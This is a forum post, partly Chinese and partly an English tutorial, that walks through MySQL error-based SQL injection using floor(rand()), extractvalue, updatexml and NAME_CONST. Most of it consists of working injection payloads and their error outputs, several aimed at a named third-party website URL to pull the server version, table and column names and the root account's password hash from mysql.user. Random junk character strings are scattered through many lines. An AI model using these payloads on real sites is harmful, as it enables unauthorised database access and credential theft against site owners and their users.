|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
2 H; M3 l n# w+ ^" T首先进行正常查询: mysql> select * from article where id = 1;
f$ F; u9 m/ o/ t+—-+——-+———+3 x' G' x1 P& G$ F8 d% T' K
| id | title | content |
1 J6 j" m9 F+ y: {5 k# C& H) U4 H+—-+——-+———+: R. C6 D" L1 s9 ~0 G7 R* h& t3 Y
| 1 | test | do it |0 `/ c8 N3 p. p
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
5 i+ w1 b- M: Y5 E; IERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。0 t$ N8 Y, [, |2 o8 @9 z2 R
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);4 d* |- u( f$ ~, k5 B
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
* e' {/ ~' b; a; k4 A- }: q: x) GERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
/ h; w1 Q3 h& Y* L测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
" {$ B1 T! b" o! B8 B, k% \ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ % e% d" O5 A1 o) r3 k- I* q0 k
! ?0 f' A$ c/ X再收集: . D5 {; y& g- Q# j" d/ O0 l; [
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
5 q0 F4 D; t# o* T& p* u! m* Q4 j) R; i/ F" t
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’8 \. Z" ~. Z& V: ~7 L
$ i/ }$ u; f/ L& O) ]# v. P. d; N
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)! z* w) w$ o# E$ L# M; \5 E
9 b$ W3 [1 e* W& ~3 q Y& X
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
0 f# w0 X3 ^) u P
3 K+ I# F; ^2 K$ WMYSQL高版本报错注入技巧-利用NAME_CONST注入
/ ]: ^( R; V6 n7 EIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
' l: `+ V* y6 m/ U R; [6 k9 J) ^2 r2 i5 L& G
- h! G- f5 b. w相关信息
6 z9 s; A% o$ [9 P5 I* r1 I9 K! q# Q
7 {" [/ v% ]& W$ `3 K$ h% rNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that., A" q4 i& z% G9 J/ \/ ]: Z
1 q1 h1 N ]/ r
Code:' B) _. N2 P5 w9 ^, x
NAME_CONST(DATA, VALUE)
: a9 f6 ]( v7 x- H
& w( g5 T6 e0 Q: hReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
4 a8 ?! G2 Z- L6 K. I0 R2 j, ]
" @& ~7 G. z2 }# M1 T7 lSELECT NAME_CONST('TEST', 1)5 i9 d' D$ g# ~0 }' Q3 U
& }& E8 i* C7 `$ M' i
6 M- Z# x; V# e0 V( ?7 o8 e
3 a& ], p3 E+ I, d|---------------|
+ z* q2 q( T' y0 {& x* r- j) h- q7 q| TEST |
1 q5 N3 v ]+ f! F| |
! l/ O# c$ H/ t0 k: Z|---------------|
& `0 S1 E7 V, w/ c- l| 1 |
' Z, L, @# Q- N# J0 `| |; [; k# n6 U% k; I6 a
|---------------|
' z, i3 U( A4 m. P5 i+ J' w* O' P( o8 O7 j- O6 [
$ `: W7 P. S8 i q" J- y4 \
. }' Z- X2 X: d6 P+ E) z
! `0 X5 |% m9 ohttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
; T* \, `9 Z' j# ^Intro to MySQL Variables
' w4 M* t# C& r5 f" K0 v! b
; j' [2 t& w- e7 \' P3 a* YOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.% }" \: N1 A2 H; u+ K7 f
( t6 `! D% @' @5 b WCode:
5 x& U3 N7 V1 s/ E0 R( Ehttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261/ N* r# @ O* O& O
* M5 \, Q5 J2 y' {
6 c6 L$ ^1 N' Z4 I
7 f( w1 e6 C" {% q) z6 v* K
- J+ m. i" [( ?6 @9 w- R$ r
9 E& ] p% i# f+ wCode:1 P& u6 N" @3 n9 k. {* f. y
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
1 v7 `' b! J! {9 c' \ ?4 y. ~' X' P5 f) [* C
; z# w; k$ j2 W
VAR = Your MySQL variable.5 F& Y, O9 z# b- l& a+ Q" H
( | P; c* ^$ o3 AMySQL 5.1.3 Server System Variables- C! j% O0 d7 i$ o9 a! R) i) _; q
5 \, v+ o. c0 R* @& {
Let's try it out on my site..
) h7 K6 R: M9 j) c- c, `
5 |' `/ d4 m; f; `: xCode:
% U v: E% u8 K1 S. rhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- o$ {& f, B; d0 s0 t0 q
& S( Q$ E% q# b& T( y
Erroruplicate column name '5.0.27-community-nt'. U6 e: ]- m! A# x
- d$ J& C/ Q5 X$ Y; c
0 ~- I8 H9 d. O! M, B, o1 Z' v1 @7 i# {- H+ t0 p
. k3 ^5 V5 C' Y$ |
" V; z' L7 U( m4 h3 ZNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...6 U; a! B+ {( T4 e0 ]+ Z( \
0 |2 j1 z- R; t* g5 n I
Data Extraction5 R, `! B( J" l: X# ~
( U; `- E R* J7 o, n* J
Code:; j# s: D! j' x9 M0 c
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
& d. Z8 Y, W; }& N2 F, T. H3 Q0 y. h8 x) j6 x# ~7 O- {
l# P" X3 ~% \ j: G
We should get a duplicate column 1 error... F- z9 l5 L1 p( T* e
9 n! U- Q3 B. T2 R! ?7 d8 F% R( I: t+ K
Code:
4 {( w) M% U4 r B# ^http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
( |2 q3 {$ M/ N& ^0 p3 N8 Y# j" c
1 O- A6 `3 t) _/ \Erroruplicate column name '1: g$ X( ^8 s( e# u/ G# c
( U% u# m" Z7 R; b0 ?7 K1 \- Q- s+ u- H: i$ C
" H, k& x$ f8 _3 Q \
% j& |- _ O; n8 f; X2 V8 I, f+ V8 Z, S3 V
0 G8 Q7 z& w0 S$ W+ c! z* O' G! V
Now let's get the tables out this bitch... n" @1 |9 E& a1 `
- O, r+ \0 X! e! Z& E8 J% ^( wCode:
4 K# O0 u# T3 h, M6 G6 F! c8 ?+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
1 ]. {% B `% j. M$ u
9 F- {0 z& `- ^3 n4 ~3 {
8 M0 ?5 r, J7 {4 E7 Y2 d, N% T1 b7 PLet's see if it works here, if it does, we can go on and finish the job.
1 S7 r" a* a9 F2 S: ~6 n
% H4 J+ Q3 _! p% h. S, sCode:+ Z! I9 t" Y5 f& r4 C$ ^
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--0 I) I5 F* N8 W
+ K/ ~2 B: a6 n) L& m' ?
. O( V6 W* r) {( z
Erroruplicate column name 'com_admanage9 ?7 F4 f" Z+ R0 h
6 _% H9 x/ G) t) ?
: N( d5 i* O- U: b' M; a- X4 |9 D$ z
) r, _/ y. o; K5 {: J# m
! I4 H* y3 y6 V0 {* j; g' a: V6 }7 K% h9 w2 \( g
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
2 F* L9 j. O- `) ]5 L6 E1 E% u; S' L8 T c Y! X
Let's get the columns out of the user table..
3 W6 X3 N5 k6 d; v+ q! f g$ r8 z
Code:7 a* i) D9 L9 K3 h. w) ]3 Z5 y& e
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)-- b4 Y& I* g# R7 `1 ~+ [
( g) v& v2 f, F* Z. r( F) o5 o/ C3 V2 {, `$ [8 r
So mine looks like this, and I get the duplicate column name 'Host'.% G% ?0 o* x) p( g
/ V9 J( d5 {- Y8 D+ e
Code:* F, O2 f4 m* x& W" w& k
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
( ~5 D+ b- x& F0 n0 ^: \7 Z& l0 ]7 i0 @9 q, U5 p
Erroruplicate column name 'Host'
3 Z; f1 l9 n- x4 Y0 B. c5 u, d4 _4 J: A
% X; a5 e9 \' z: f
' ]/ r6 d0 a9 O0 z! r! J/ J
1 J: B* H0 E) M, e2 \7 z
& ?4 }' s7 R0 A: m& Y
! e; Y, F2 U( A* k+ JWoot, time to finish this bitch off.3 ~/ Z- O/ {& i$ H
: ]8 S) P8 ^: M$ U7 B/ C5 k
Code:
" E/ y! b G! w+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
1 Q5 R0 `* S! D& @9 m' Q4 Y% m9 ]8 w+ u. E- Q9 B. F: G; r
" O* R# b6 W; v( `" Y! a3 hSo mine looks like this.... f N# I3 y# H* R7 s7 h
* x' W3 \0 q% c- [ t4 O$ v
Code:9 W8 A! R8 J, U" L
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--/ f/ Q6 a/ u& ~9 N0 K
9 I% v0 C" N+ F; N" [Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
- i% T5 ?7 A5 a! |% V/ w0 z* A" B! ]# X2 X1 x# U4 H
, V4 F. h' E# V+ i' a0 w( S- Z# \
* `$ P( ?7 k, @0 j7 V+ J/ g0 R2 X7 Z* ]: T5 u9 o
. ?" T/ R2 b" K) s+ |
/ A+ @+ r. f: H& U9 ^- R; JAnd there we have it, thanks for reading./ ]3 q) C$ N2 j
/ I4 `7 H/ E- n' H3 W- ^' G |
发表于 2015-11-11 19:03:37
收藏
支持
反对